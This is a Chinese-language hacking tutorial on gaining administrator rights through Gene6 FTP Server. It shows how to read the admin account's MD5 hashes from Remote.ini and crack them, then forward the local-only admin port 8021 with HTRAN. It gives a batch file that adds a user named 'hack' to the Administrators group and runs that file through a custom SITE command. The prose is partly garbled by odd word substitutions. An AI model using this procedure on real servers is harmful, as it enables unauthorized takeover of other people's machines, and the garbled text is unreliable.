Gene6 FTP Server提权方式





by:晓华
Gene6 FTP Server这个FTP软件简略易用,比SU的保险性高的多.
他的默认管理端口是8021,只容许本机盘算机连接.外部计算机即便你得到管理帐,你也不能登陆进去.
这一点和我们的SU一样,SU的管理端口是43958.
Gene6 FTP Server的帐户配置文件在:C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini;
假如不在请本人手动查找.详细的不再空话.
.Server.
IP127.0.0.1,8021\r\n 这个是本地管理IP 跟默认管理的端口,端口是可以修正的.
GrantAllAccessToLocalHost0
.AcctAdministrator. 治理帐户
Enabled1
Rights0
Password202CB962AC59075B964B07152D234B70 管理帐户的密码的MD5的加密字符串
.Acct124. 这个是普通帐,,注意Acct124这个帐,不是124,而是24;124中的1代表第一个帐,.
Enabled1
PasswordC8FFE9A587B126F152ED3D89A146B445 MD5的加密字符串,可以去破解出密码的明文.
Domain
RootFolder
Rights0
IPAccessList
我们得到管理密码后如何才干登陆上去管理呢 我们可以用HTRAN的端口转发功效,把默认管理端口转发到其余端口,
然落后行衔接.我们本地当时也装置一个Gene6 FTP Server软件.而后配置.
新建一个远程FTP管理

HOST那里输入你要提权的IP
PORT输入你用端口转发工具转发的端口,
USERNAME和PASSWORD输入Gene6 FTP Server的帐户配置文件所破解的帐,和密码信息,留神密码是MD5加密过的.必需输入明文的.
不出意外我们就可以连接上去了.我们可以新建一个一般的帐,.
我这里建一个名为msnhack密码为manhack的帐,然后抉择好管理目录,然后我们在权限配置那里配置好权限.可以全体选上..

这样还不能提权.这里到了我们最中心的一步.
1.写一个能执行命令的批处置文件,并上传到目的主机.
echo off
net user hack hack /add
net localgroup administrators hack /add
2.然后在SITE MANDS那个处所再进行配置.

MAND那输入你的命令履行的名字.我写的是HACK DESCRIPTTION这个是写描写的.这里随意你写什么都能够的.
EXECUTE这里输入你的BAT的命令执行文件的门路.也就是你刚上传的那个文件的路径.点OK就可以了.现在我们来看下我们本地的帐,情形.

只有两个帐,.当初我们登陆FTP进行提权操作.输入提权命令 "quote site hack"

200 Command executed 命令成功执行.
咱们来看下加上帐,不.

已经多了一个HACK的帐,,权限为管理权限.晋升权限已经胜利.


01-07 02:35